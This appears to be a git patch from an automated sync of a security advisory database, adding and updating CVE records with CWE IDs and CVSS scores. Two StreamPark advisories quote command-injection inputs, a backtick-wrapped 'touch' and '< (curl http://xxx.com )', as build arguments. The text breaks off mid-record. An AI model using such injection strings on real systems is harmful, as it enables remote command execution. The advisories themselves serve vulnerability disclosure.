From ec42b2945cb81f071ba1ceca29429116e24c6e1d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 19 Jul 2024 18:32:47 +0000 Subject: [PATCH] Advisory Database Sync --- .../GHSA-rx7p-m6c3-777g.json | 6 +++- .../GHSA-29rm-j4cx-hmc5.json | 4 +-- .../GHSA-2jcw-rxcr-pwmp.json | 9 +++-- .../GHSA-3h7x-h2gx-59gv.json | 35 +++++++++++++++++++ .../GHSA-5v69-92vw-fmjh.json | 9 +++-- .../GHSA-6cq4-fw23-j7vw.json | 2 +- .../GHSA-777h-w3w2-h4q5.json | 2 +- .../GHSA-7g94-hfqc-q993.json | 9 +++-- .../GHSA-7hc6-qhpj-2x7q.json | 9 +++-- .../GHSA-7v6r-4575-fvg7.json | 2 +- .../GHSA-87xw-f5qh-7hwg.json | 35 +++++++++++++++++++ .../GHSA-97m9-vjwc-7vr3.json | 1 + .../GHSA-9g8f-2366-pj88.json | 35 +++++++++++++++++++ .../GHSA-ccf5-hqv5-p85q.json | 35 +++++++++++++++++++ .../GHSA-fj2g-5hj7-74ww.json | 4 +-- .../GHSA-fw3f-4xpx-x3jp.json | 35 +++++++++++++++++++ .../GHSA-grw7-f5c2-vc83.json | 35 +++++++++++++++++++ .../GHSA-hx5r-m6gq-f3fp.json | 2 +- .../GHSA-j36g-v6mv-g3hp.json | 2 +- .../GHSA-jhhr-8858-58w9.json | 35 +++++++++++++++++++ .../GHSA-jj6p-vx99-g288.json | 4 +-- .../GHSA-m32m-7r76-7jh4.json | 35 +++++++++++++++++++ .../GHSA-mg8c-4q9p-v679.json | 2 +- .../GHSA-pj78-8h7f-mg7f.json | 4 +-- .../GHSA-q9gp-xh68-xx23.json | 2 +- .../GHSA-v545-g82r-gvw3.json | 2 +- .../GHSA-vm99-c867-38q4.json | 4 +-- .../GHSA-w8fj-xvmx-vq79.json | 4 +-- .../GHSA-xgmg-7q7c-fhxx.json | 4 +-- 29 files changed, 332 insertions(+), 35 deletions(-) create mode 100644 advisories/unreviewed/2024/07/GHSA-3h7x-h2gx-59gv/GHSA-3h7x-h2gx-59gv.json create mode 100644 advisories/unreviewed/2024/07/GHSA-87xw-f5qh-7hwg/GHSA-87xw-f5qh-7hwg.json create mode 100644 advisories/unreviewed/2024/07/GHSA-9g8f-2366-pj88/GHSA-9g8f-2366-pj88.json create mode 100644 advisories/unreviewed/2024/07/GHSA-ccf5-hqv5-p85q/GHSA-ccf5-hqv5-p85q.json create mode 100644 advisories/unreviewed/2024/07/GHSA-fw3f-4xpx-x3jp/GHSA-fw3f-4xpx-x3jp.json create mode 100644 advisories/unreviewed/2024/07/GHSA-grw7-f5c2-vc83/GHSA-grw7-f5c2-vc83.json create mode 100644 advisories/unreviewed/2024/07/GHSA-jhhr-8858-58w9/GHSA-jhhr-8858-58w9.json create mode 100644 advisories/unreviewed/2024/07/GHSA-m32m-7r76-7jh4/GHSA-m32m-7r76-7jh4.json diff --git a/advisories/unreviewed/2024/05/GHSA-rx7p-m6c3-777g/GHSA-rx7p-m6c3-777g.json b/advisories/unreviewed/2024/05/GHSA-rx7p-m6c3-777g/GHSA-rx7p-m6c3-777g.json index 176a7886581..440fbde1e73 100644 --- a/advisories/unreviewed/2024/05/GHSA-rx7p-m6c3-777g/GHSA-rx7p-m6c3-777g.json +++ b/advisories/unreviewed/2024/05/GHSA-rx7p-m6c3-777g/GHSA-rx7p-m6c3-777g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rx7p-m6c3-777g", - "modified": "2024-07-19T00:31:41Z", + "modified": "2024-07-19T18:31:19Z", "published": "2024-05-31T21:30:52Z", "aliases": [ "CVE-2024-5564" @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:4641" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:4642" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:4643" diff --git a/advisories/unreviewed/2024/07/GHSA-29rm-j4cx-hmc5/GHSA-29rm-j4cx-hmc5.json b/advisories/unreviewed/2024/07/GHSA-29rm-j4cx-hmc5/GHSA-29rm-j4cx-hmc5.json index e76401b46f8..48f5e49a1ce 100644 --- a/advisories/unreviewed/2024/07/GHSA-29rm-j4cx-hmc5/GHSA-29rm-j4cx-hmc5.json +++ b/advisories/unreviewed/2024/07/GHSA-29rm-j4cx-hmc5/GHSA-29rm-j4cx-hmc5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-29rm-j4cx-hmc5", - "modified": "2024-07-17T15:30:49Z", + "modified": "2024-07-19T18:31:21Z", "published": "2024-07-17T09:30:49Z", "aliases": [ "CVE-2024-6220" @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-2jcw-rxcr-pwmp/GHSA-2jcw-rxcr-pwmp.json b/advisories/unreviewed/2024/07/GHSA-2jcw-rxcr-pwmp/GHSA-2jcw-rxcr-pwmp.json index 100f059107a..2c785b40fa7 100644 --- a/advisories/unreviewed/2024/07/GHSA-2jcw-rxcr-pwmp/GHSA-2jcw-rxcr-pwmp.json +++ b/advisories/unreviewed/2024/07/GHSA-2jcw-rxcr-pwmp/GHSA-2jcw-rxcr-pwmp.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2jcw-rxcr-pwmp", - "modified": "2024-07-18T12:30:52Z", + "modified": "2024-07-19T18:31:20Z", "published": "2024-07-15T09:36:30Z", "aliases": [ "CVE-2024-41007" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: avoid too many retransmit packets\n\nIf a TCP socket is using TCP_USER_TIMEOUT, and the other peer\nretracted its window to zero, tcp_retransmit_timer() can\nretransmit a packet every two jiffies (2 ms for HZ=1000),\nfor about 4 minutes after TCP_USER_TIMEOUT has 'expired'.\n\nThe fix is to make sure tcp_rtx_probe0_timed_out() takes\nicsk->icsk_user_timeout into account.\n\nBefore blamed commit, the socket would not timeout after\nicsk->icsk_user_timeout, but would use standard exponential\nbackoff for the retransmits.\n\nAlso worth noting that before commit e89688e3e978 (\"net: tcp:\nfix unexcepted socket die when snd_wnd is 0\"), the issue\nwould last 2 minutes instead of 4.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } ], "affected": [ @@ -55,7 +58,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-07-15T09:15:02Z" diff --git a/advisories/unreviewed/2024/07/GHSA-3h7x-h2gx-59gv/GHSA-3h7x-h2gx-59gv.json b/advisories/unreviewed/2024/07/GHSA-3h7x-h2gx-59gv/GHSA-3h7x-h2gx-59gv.json new file mode 100644 index 00000000000..d6370069404 --- /dev/null +++ b/advisories/unreviewed/2024/07/GHSA-3h7x-h2gx-59gv/GHSA-3h7x-h2gx-59gv.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3h7x-h2gx-59gv", + "modified": "2024-07-19T18:31:21Z", + "published": "2024-07-19T18:31:21Z", + "aliases": [ + "CVE-2024-41281" + ], + "details": "Linksys WRT54G v4.21.5 has a stack overflow vulnerability in get_merge_mac function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41281" + }, + { + "type": "WEB", + "url": "https://github.com/BuaaIOTTeam/Iot_Linksys/blob/main/Linksys_WRT54G_get_merge_mac.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-07-19T17:15:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/07/GHSA-5v69-92vw-fmjh/GHSA-5v69-92vw-fmjh.json b/advisories/unreviewed/2024/07/GHSA-5v69-92vw-fmjh/GHSA-5v69-92vw-fmjh.json index 8c3a76022e0..2078192af78 100644 --- a/advisories/unreviewed/2024/07/GHSA-5v69-92vw-fmjh/GHSA-5v69-92vw-fmjh.json +++ b/advisories/unreviewed/2024/07/GHSA-5v69-92vw-fmjh/GHSA-5v69-92vw-fmjh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5v69-92vw-fmjh", - "modified": "2024-07-17T15:30:49Z", + "modified": "2024-07-19T18:31:21Z", "published": "2024-07-17T09:30:49Z", "aliases": [ "CVE-2024-29737" ], "details": "In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.4\n\nBackground info:\n\nLog in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the \"Build Argument\". Note that there is no verification and interception of the special character \"`\". As a result, you will find that this injection command will be successfully executed after executing the build.\n\nIn the latest version, the special symbol ` is intercepted.\n\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ "CWE-77" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-07-17T09:15:02Z" diff --git a/advisories/unreviewed/2024/07/GHSA-6cq4-fw23-j7vw/GHSA-6cq4-fw23-j7vw.json b/advisories/unreviewed/2024/07/GHSA-6cq4-fw23-j7vw/GHSA-6cq4-fw23-j7vw.json index c5a14a3081e..e96e5158501 100644 --- a/advisories/unreviewed/2024/07/GHSA-6cq4-fw23-j7vw/GHSA-6cq4-fw23-j7vw.json +++ b/advisories/unreviewed/2024/07/GHSA-6cq4-fw23-j7vw/GHSA-6cq4-fw23-j7vw.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-777h-w3w2-h4q5/GHSA-777h-w3w2-h4q5.json b/advisories/unreviewed/2024/07/GHSA-777h-w3w2-h4q5/GHSA-777h-w3w2-h4q5.json index dedc9dbe34e..353eaa10cdd 100644 --- a/advisories/unreviewed/2024/07/GHSA-777h-w3w2-h4q5/GHSA-777h-w3w2-h4q5.json +++ b/advisories/unreviewed/2024/07/GHSA-777h-w3w2-h4q5/GHSA-777h-w3w2-h4q5.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-7g94-hfqc-q993/GHSA-7g94-hfqc-q993.json b/advisories/unreviewed/2024/07/GHSA-7g94-hfqc-q993/GHSA-7g94-hfqc-q993.json index bc9de9cc4c1..d3b89a94385 100644 --- a/advisories/unreviewed/2024/07/GHSA-7g94-hfqc-q993/GHSA-7g94-hfqc-q993.json +++ b/advisories/unreviewed/2024/07/GHSA-7g94-hfqc-q993/GHSA-7g94-hfqc-q993.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7g94-hfqc-q993", - "modified": "2024-07-17T15:30:49Z", + "modified": "2024-07-19T18:31:21Z", "published": "2024-07-17T09:30:49Z", "aliases": [ "CVE-2023-52291" ], "details": "In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nBackground:\n\nIn the \"Project\" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection,\n\nMitigation:\n\nall users should upgrade to 2.1.4,  The \"<\" operator will blocked。\n\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ "CWE-77" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-07-17T09:15:02Z" diff --git a/advisories/unreviewed/2024/07/GHSA-7hc6-qhpj-2x7q/GHSA-7hc6-qhpj-2x7q.json b/advisories/unreviewed/2024/07/GHSA-7hc6-qhpj-2x7q/GHSA-7hc6-qhpj-2x7q.json index 63a85bb262c..a6e51f2a395 100644 --- a/advisories/unreviewed/2024/07/GHSA-7hc6-qhpj-2x7q/GHSA-7hc6-qhpj-2x7q.json +++ b/advisories/unreviewed/2024/07/GHSA-7hc6-qhpj-2x7q/GHSA-7hc6-qhpj-2x7q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7hc6-qhpj-2x7q", - "modified": "2024-07-16T15:30:47Z", + "modified": "2024-07-19T18:31:20Z", "published": "2024-07-16T15:30:47Z", "aliases": [ "CVE-2022-48834" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: usbtmc: Fix bug in pipe direction for control transfers\n\nThe syzbot fuzzer reported a minor bug in the usbtmc driver:\n\nusb 5-1: BOGUS control dir, pipe 80001e80 doesn't match bRequestType 0\nWARNING: CPU: 0 PID: 3813 at drivers/usb/core/urb.c:412\nusb_submit_urb+0x13a5/0x1970 drivers/usb/core/urb.c:410\nModules linked in:\nCPU: 0 PID: 3813 Comm: syz-executor122 Not tainted\n5.17.0-rc5-syzkaller-00306-g2293be58d6a1 #0\n...\nCall Trace:\n \n usb_start_wait_urb+0x113/0x530 drivers/usb/core/message.c:58\n usb_internal_control_msg drivers/usb/core/message.c:102 [inline]\n usb_control_msg+0x2a5/0x4b0 drivers/usb/core/message.c:153\n usbtmc_ioctl_request drivers/usb/class/usbtmc.c:1947 [inline]\n\nThe problem is that usbtmc_ioctl_request() uses usb_rcvctrlpipe() for\nall of its transfers, whether they are in or out. It's easy to fix.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -43,7 +46,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-07-16T13:15:10Z" diff --git a/advisories/unreviewed/2024/07/GHSA-7v6r-4575-fvg7/GHSA-7v6r-4575-fvg7.json b/advisories/unreviewed/2024/07/GHSA-7v6r-4575-fvg7/GHSA-7v6r-4575-fvg7.json index 43b7f97283e..34029b7469e 100644 --- a/advisories/unreviewed/2024/07/GHSA-7v6r-4575-fvg7/GHSA-7v6r-4575-fvg7.json +++ b/advisories/unreviewed/2024/07/GHSA-7v6r-4575-fvg7/GHSA-7v6r-4575-fvg7.json @@ -40,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-87xw-f5qh-7hwg/GHSA-87xw-f5qh-7hwg.json b/advisories/unreviewed/2024/07/GHSA-87xw-f5qh-7hwg/GHSA-87xw-f5qh-7hwg.json new file mode 100644 index 00000000000..6589aa8d171 --- /dev/null +++ b/advisories/unreviewed/2024/07/GHSA-87xw-f5qh-7hwg/GHSA-87xw-f5qh-7hwg.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87xw-f5qh-7hwg", + "modified": "2024-07-19T18:31:21Z", + "published": "2024-07-19T18:31:21Z", + "aliases": [ + "CVE-2024-41603" + ], + "details": "Spina CMS v2.18.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the URI /admin/layout.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41603" + }, + { + "type": "WEB", + "url": "https://github.com/topsky979/Security-Collections/tree/main/CVE-2024-41603" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-07-19T17:15:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/07/GHSA-97m9-vjwc-7vr3/GHSA-97m9-vjwc-7vr3.json b/advisories/unreviewed/2024/07/GHSA-97m9-vjwc-7vr3/GHSA-97m9-vjwc-7vr3.json index ec3f37c41b9..e8a07864c71 100644 --- a/advisories/unreviewed/2024/07/GHSA-97m9-vjwc-7vr3/GHSA-97m9-vjwc-7vr3.json +++ b/advisories/unreviewed/2024/07/GHSA-97m9-vjwc-7vr3/GHSA-97m9-vjwc-7vr3.json @@ -44,6 +44,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-24" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2024/07/GHSA-9g8f-2366-pj88/GHSA-9g8f-2366-pj88.json b/advisories/unreviewed/2024/07/GHSA-9g8f-2366-pj88/GHSA-9g8f-2366-pj88.json new file mode 100644 index 00000000000..cc18c448825 --- /dev/null +++ b/advisories/unreviewed/2024/07/GHSA-9g8f-2366-pj88/GHSA-9g8f-2366-pj88.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9g8f-2366-pj88", + "modified": "2024-07-19T18:31:21Z", + "published": "2024-07-19T18:31:21Z", + "aliases": [ + "CVE-2024-41600" + ], + "details": "Insecure Permissions vulnerability in lin-CMS Springboot v.0.2.1 and before allows a remote attacker to obtain sensitive information via the login method in the UserController.java component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41600" + }, + { + "type": "WEB", + "url": "https://github.com/topsky979/Security-Collections/tree/main/CVE-2024-41600" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-07-19T18:15:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/07/GHSA-ccf5-hqv5-p85q/GHSA-ccf5-hqv5-p85q.json b/advisories/unreviewed/2024/07/GHSA-ccf5-hqv5-p85q/GHSA-ccf5-hqv5-p85q.json new file mode 100644 index 00000000000..db79580bff6 --- /dev/null +++ b/advisories/unreviewed/2024/07/GHSA-ccf5-hqv5-p85q/GHSA-ccf5-hqv5-p85q.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ccf5-hqv5-p85q", + "modified": "2024-07-19T18:31:21Z", + "published": "2024-07-19T18:31:21Z", + "aliases": [ + "CVE-2024-29080" + ], + "details": "Potential vulnerabilities have been identified in the HP Display Control software component within the HP Application Enabling Software Driver which might allow escalation of privilege.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29080" + }, + { + "type": "WEB", + "url": "https://support.hp.com/us-en/document/ish_10914875-10914901-16/hpsbhf03954" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-07-19T17:15:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/07/GHSA-fj2g-5hj7-74ww/GHSA-fj2g-5hj7-74ww.json b/advisories/unreviewed/2024/07/GHSA-fj2g-5hj7-74ww/GHSA-fj2g-5hj7-74ww.json index 2429fc856d8..31e3429acc8 100644 --- a/advisories/unreviewed/2024/07/GHSA-fj2g-5hj7-74ww/GHSA-fj2g-5hj7-74ww.json +++ b/advisories/unreviewed/2024/07/GHSA-fj2g-5hj7-74ww/GHSA-fj2g-5hj7-74ww.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fj2g-5hj7-74ww", - "modified": "2024-07-17T09:30:49Z", + "modified": "2024-07-19T18:31:21Z", "published": "2024-07-17T09:30:49Z", "aliases": [ "CVE-2024-5703" @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-fw3f-4xpx-x3jp/GHSA-fw3f-4xpx-x3jp.json b/advisories/unreviewed/2024/07/GHSA-fw3f-4xpx-x3jp/GHSA-fw3f-4xpx-x3jp.json new file mode 100644 index 00000000000..d8220435556 --- /dev/null +++ b/advisories/unreviewed/2024/07/GHSA-fw3f-4xpx-x3jp/GHSA-fw3f-4xpx-x3jp.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fw3f-4xpx-x3jp", + "modified": "2024-07-19T18:31:21Z", + "published": "2024-07-19T18:31:21Z", + "aliases": [ + "CVE-2024-24970" + ], + "details": "Potential vulnerabilities have been identified in the HP Display Control software component within the HP Application Enabling Software Driver which might allow escalation of privilege. ", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24970" + }, + { + "type": "WEB", + "url": "https://support.hp.com/us-en/document/ish_10914875-10914901-16/hpsbhf03954" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-07-19T17:15:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/07/GHSA-grw7-f5c2-vc83/GHSA-grw7-f5c2-vc83.json b/advisories/unreviewed/2024/07/GHSA-grw7-f5c2-vc83/GHSA-grw7-f5c2-vc83.json new file mode 100644 index 00000000000..6e9de240c58 --- /dev/null +++ b/advisories/unreviewed/2024/07/GHSA-grw7-f5c2-vc83/GHSA-grw7-f5c2-vc83.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-grw7-f5c2-vc83", + "modified": "2024-07-19T18:31:21Z", + "published": "2024-07-19T18:31:21Z", + "aliases": [ + "CVE-2024-41492" + ], + "details": "A stack overflow in Tenda AX1806 v1.0.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41492" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Swind1er/4176fdc25e415296904c9fb19e2f8293" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-07-19T17:15:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/07/GHSA-hx5r-m6gq-f3fp/GHSA-hx5r-m6gq-f3fp.json b/advisories/unreviewed/2024/07/GHSA-hx5r-m6gq-f3fp/GHSA-hx5r-m6gq-f3fp.json index 35d0fdf463b..05e6a972eb9 100644 --- a/advisories/unreviewed/2024/07/GHSA-hx5r-m6gq-f3fp/GHSA-hx5r-m6gq-f3fp.json +++ b/advisories/unreviewed/2024/07/GHSA-hx5r-m6gq-f3fp/GHSA-hx5r-m6gq-f3fp.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-j36g-v6mv-g3hp/GHSA-j36g-v6mv-g3hp.json b/advisories/unreviewed/2024/07/GHSA-j36g-v6mv-g3hp/GHSA-j36g-v6mv-g3hp.json index f25497c5b01..0248c47d1a6 100644 --- a/advisories/unreviewed/2024/07/GHSA-j36g-v6mv-g3hp/GHSA-j36g-v6mv-g3hp.json +++ b/advisories/unreviewed/2024/07/GHSA-j36g-v6mv-g3hp/GHSA-j36g-v6mv-g3hp.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-jhhr-8858-58w9/GHSA-jhhr-8858-58w9.json b/advisories/unreviewed/2024/07/GHSA-jhhr-8858-58w9/GHSA-jhhr-8858-58w9.json new file mode 100644 index 00000000000..dc7b28a8760 --- /dev/null +++ b/advisories/unreviewed/2024/07/GHSA-jhhr-8858-58w9/GHSA-jhhr-8858-58w9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhhr-8858-58w9", + "modified": "2024-07-19T18:31:21Z", + "published": "2024-07-19T18:31:21Z", + "aliases": [ + "CVE-2024-41601" + ], + "details": "Insecure Permissions vulnerability in lin-CMS v.0.2.0 and before allows a remote attacker to obtain sensitive information via the login method in the UserController.java component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41601" + }, + { + "type": "WEB", + "url": "https://github.com/topsky979/Security-Collections/tree/main/CVE-2024-41601" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-07-19T17:15:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/07/GHSA-jj6p-vx99-g288/GHSA-jj6p-vx99-g288.json b/advisories/unreviewed/2024/07/GHSA-jj6p-vx99-g288/GHSA-jj6p-vx99-g288.json index cfb2c6b923d..801e709e366 100644 --- a/advisories/unreviewed/2024/07/GHSA-jj6p-vx99-g288/GHSA-jj6p-vx99-g288.json +++ b/advisories/unreviewed/2024/07/GHSA-jj6p-vx99-g288/GHSA-jj6p-vx99-g288.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jj6p-vx99-g288", - "modified": "2024-07-09T09:30:56Z", + "modified": "2024-07-19T18:31:20Z", "published": "2024-07-09T09:30:56Z", "aliases": [ "CVE-2024-5457" @@ -40,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-m32m-7r76-7jh4/GHSA-m32m-7r76-7jh4.json b/advisories/unreviewed/2024/07/GHSA-m32m-7r76-7jh4/GHSA-m32m-7r76-7jh4.json new file mode 100644 index 00000000000..52236bd4fbf --- /dev/null +++ b/advisories/unreviewed/2024/07/GHSA-m32m-7r76-7jh4/GHSA-m32m-7r76-7jh4.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m32m-7r76-7jh4", + "modified": "2024-07-19T18:31:21Z", + "published": "2024-07-19T18:31:21Z", + "aliases": [ + "CVE-2024-41602" + ], + "details": "Cross Site Request Forgery vulnerability in Spina CMS v.2.18.0 and before allows a remote attacker to escalate privileges via a crafted URL", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41602" + }, + { + "type": "WEB", + "url": "https://github.com/topsky979/Security-Collections/tree/main/CVE-2024-41602" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-07-19T17:15:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/07/GHSA-mg8c-4q9p-v679/GHSA-mg8c-4q9p-v679.json b/advisories/unreviewed/2024/07/GHSA-mg8c-4q9p-v679/GHSA-mg8c-4q9p-v679.json index 76272054db7..f09cd18fe9e 100644 --- a/advisories/unreviewed/2024/07/GHSA-mg8c-4q9p-v679/GHSA-mg8c-4q9p-v679.json +++ b/advisories/unreviewed/2024/07/GHSA-mg8c-4q9p-v679/GHSA-mg8c-4q9p-v679.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-pj78-8h7f-mg7f/GHSA-pj78-8h7f-mg7f.json b/advisories/unreviewed/2024/07/GHSA-pj78-8h7f-mg7f/GHSA-pj78-8h7f-mg7f.json index 1ad80106b9a..40239e092da 100644 --- a/advisories/unreviewed/2024/07/GHSA-pj78-8h7f-mg7f/GHSA-pj78-8h7f-mg7f.json +++ b/advisories/unreviewed/2024/07/GHSA-pj78-8h7f-mg7f/GHSA-pj78-8h7f-mg7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pj78-8h7f-mg7f", - "modified": "2024-07-17T09:30:49Z", + "modified": "2024-07-19T18:31:20Z", "published": "2024-07-17T09:30:48Z", "aliases": [ "CVE-2024-6660" @@ -44,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/07/GHSA-q9gp-xh68-xx23/GHSA-q9gp-xh68-xx23.json b/advisories/unreviewed/2024/07/GHSA-q9gp-xh68-xx23/GHSA-q9gp-xh68-xx23.json index fc2a7521478..9e92a66db5b 100644 --- a/advisories/unreviewed/2024/07/GHSA-q9gp-xh68-xx23/GHSA-q9gp-xh68-xx23.json +++ b/advisories/unreviewed/2024/07/GHSA-q9gp-xh68-xx23/GHSA-q9gp-xh68-xx23.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q9gp-xh68-xx23", - "modified": "2024-07-19T12:31:28Z", + "modified": "2024-07-19T18:31:21Z", "published": 